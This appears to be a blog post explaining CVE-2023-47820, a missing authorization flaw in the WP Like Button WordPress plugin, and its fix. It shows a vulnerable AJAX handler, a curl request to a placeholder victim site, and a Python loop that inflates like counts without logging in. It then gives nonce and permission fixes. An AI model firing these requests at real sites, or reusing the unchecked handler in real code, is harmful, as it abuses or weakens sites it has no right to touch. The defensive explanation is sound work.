WordPress is the most popular CMS, and plugins like WP Like Button by CRUDLab add some fun social features for users, letting people “like” posts or pages. But even small features can hide big security problems if they’re not coded right.
Today, I will break down CVE-2023-47820, a missing authorization vulnerability in WP Like Button (any version up to 1.7.). I’ll explain what’s going on, why it’s dangerous, show you how an attacker could use it, and how admins can protect their site.
What Is CVE-2023-47820?
- CVE-2023-47820 is a vulnerability due to missing access control in the WP Like Button plugin for WordPress.
- It allows anyone, even unauthenticated users (not logged in), to perform actions meant only for authorized users.
- This means attackers can interact with the plugin’s liking system without any restrictions, which may break trust, pollute like statistics, or even perform other malicious actions depending on site configuration.
Status:
References
- CVE Details
- Plugin Vulnerabilities Report
- WP Like Button Plugin Page
How Does the Exploit Work?
The vulnerability happens because the plugin’s main AJAX endpoint responsible for liking/unliking doesn’t check if the request is coming from a logged-in user or if the user has the necessary permissions.
Here’s a simplified snippet of what often goes wrong in these plugins:
// Located in plugin's AJAX handler file.
// Registered for both anonymous (nopriv) and logged-in requests.
add_action('wp_ajax_nopriv_wplb_like', 'wplb_like_handler');
add_action('wp_ajax_wplb_like', 'wplb_like_handler');

function wplb_like_handler() {
    $post_id = intval($_POST['post_id']);
    // No checks for current_user_can() or is_user_logged_in()
    $likes = get_post_meta($post_id, '_wplb_likes', true);
    $likes++;
    update_post_meta($post_id, '_wplb_likes', $likes);
    wp_send_json_success(array(
        'likes' => $likes
    ));
    exit;
}
What's missing?
- Authorization Checks: There’s no code like if( ! is_user_logged_in() ) { /* ... */ } or a capability check such as current_user_can('something').
- Nonce Validation: There is no check for a WordPress nonce, so there is no way to be sure the request originated from a legitimate page.
Real World Impact
With code like this, anyone on the internet can hit your site’s AJAX endpoint and increment the like count as much as they want, even with an automated script or bot.
The plugin exposes an AJAX action, typically at:
https://your-wordpress-site.com/wp-admin/admin-ajax.php
Example using curl:
curl -X POST https://victim.com/wp-admin/admin-ajax.php \
    -d "action=wplb_like&post_id=42"
Response:
{"success":true,"data":{"likes":123}}
Do this as often as you want—no login needed, no security checks!
An attacker (or even a mischief-maker) can automate this with a script:
import requests

# Each POST is accepted without a session or nonce, so the count simply climbs.
for i in range(100):
    r = requests.post(
        'https://victim.com/wp-admin/admin-ajax.php',
        data={'action': 'wplb_like', 'post_id': 42}
    )
    print(r.json())
This script could quickly rack up hundreds or thousands of fake likes, making the statistics useless or even triggering other issues if the like count is used elsewhere (for ranking or payment, for example).
- Reputation Damage: If your site's like counts are obviously bogus, users lose trust.
- Resource Abuse: If an attacker runs this at scale, it could trigger resource exhaustion or database bloat.
- Further Exploits: If other plugin features rely on these actions, it may open wider attack surfaces.
- Business Impact: Trust, analytics, partner relations, or revenue can be impacted if likes are used for performance metrics.
1. Update the Plugin!
CRUDLab fixed this vulnerability in version 1.7.1.
Upgrade immediately if you're running 1.7. or earlier.
2. Check for Nonces
Verify that your plugin uses WordPress nonces to prevent CSRF and unauthorized use.
3. Add Permission Checks
If you write code, always check if users are logged in or have the right permissions.
Sample Fix for the Handler:
function wplb_like_handler() {
    // Reject anonymous requests.
    if ( ! is_user_logged_in() ) {
        wp_send_json_error('You must be logged in to like posts.');
        exit;
    }
    // Reject requests that do not carry a valid nonce for this action.
    if ( ! isset($_POST['_wpnonce']) || ! wp_verify_nonce($_POST['_wpnonce'], 'wplb_like_nonce') ) {
        wp_send_json_error('Invalid nonce.');
        exit;
    }
    // ...rest of logic...
}
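As an added example (not part of the original post and not CRUDLab's code), here is the sample fix carried through to a full handler: it drops the nopriv hook, verifies the nonce with check_ajax_referer(), validates the target post, and records who liked so that repeated requests from the same account cannot inflate the count. The function name, meta key, nonce action, script handle and file path are assumptions; the WordPress API calls are real.

```php
<?php
// Added example: hardened version of the liking handler discussed above.
// Names such as wplb_like_handler_hardened and _wplb_likers are hypothetical.

// Register for logged-in users only: with no wp_ajax_nopriv_ hook,
// anonymous requests never reach the function at all.
add_action( 'wp_ajax_wplb_like', 'wplb_like_handler_hardened' );

function wplb_like_handler_hardened() {
    // 1. CSRF protection: the nonce must match the 'wplb_like_nonce' action.
    //    On failure check_ajax_referer() ends the request with a 403.
    check_ajax_referer( 'wplb_like_nonce', '_wpnonce' );

    // 2. Authorization, as defence in depth alongside the hook choice above.
    if ( ! is_user_logged_in() || ! current_user_can( 'read' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    // 3. Input validation: the target must be an existing, published post.
    $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;
    if ( ! $post || 'publish' !== $post->post_status ) {
        wp_send_json_error( array( 'message' => 'Invalid post.' ), 400 );
    }

    // 4. Idempotence: store the set of users who liked the post, so a script
    //    replaying the request cannot add more than one like per account.
    $user_id = get_current_user_id();
    $likers  = get_post_meta( $post_id, '_wplb_likers', true );
    $likers  = is_array( $likers ) ? $likers : array();
    if ( ! in_array( $user_id, $likers, true ) ) {
        $likers[] = $user_id;
        update_post_meta( $post_id, '_wplb_likers', $likers );
    }

    // The public count is derived from the liker list, never incremented blindly.
    wp_send_json_success( array( 'likes' => count( $likers ) ) );
}

// The browser needs the nonce to include as _wpnonce in its AJAX request.
// Script handle and like.js path are hypothetical.
add_action( 'wp_enqueue_scripts', function () {
    wp_enqueue_script( 'wplb-like', plugins_url( 'like.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'wplb-like', 'wplbLike', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'wplb_like_nonce' ),
    ) );
} );
```

With this structure the curl request shown earlier is refused twice over: admin-ajax.php never dispatches an anonymous request to the handler, and a request without a valid nonce is rejected before any post meta is touched.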
Conclusion
CVE-2023-47820 is a classic example of a “Missing Authorization” bug that’s easy to overlook, and even easier to abuse. If you run any plugin, make sure it’s up-to-date and properly validates every user interaction. If you develop plugins, always double-check security: don’t assume a public endpoint is safe without checks!
Summary:
Always keep plugins updated and add proper authorization for all actions.
More info:
- CVE-2023-47820 (MITRE)
- WPScan Vulnerability Page
Timeline
Published on: 12/09/2024 13:15:31 UTC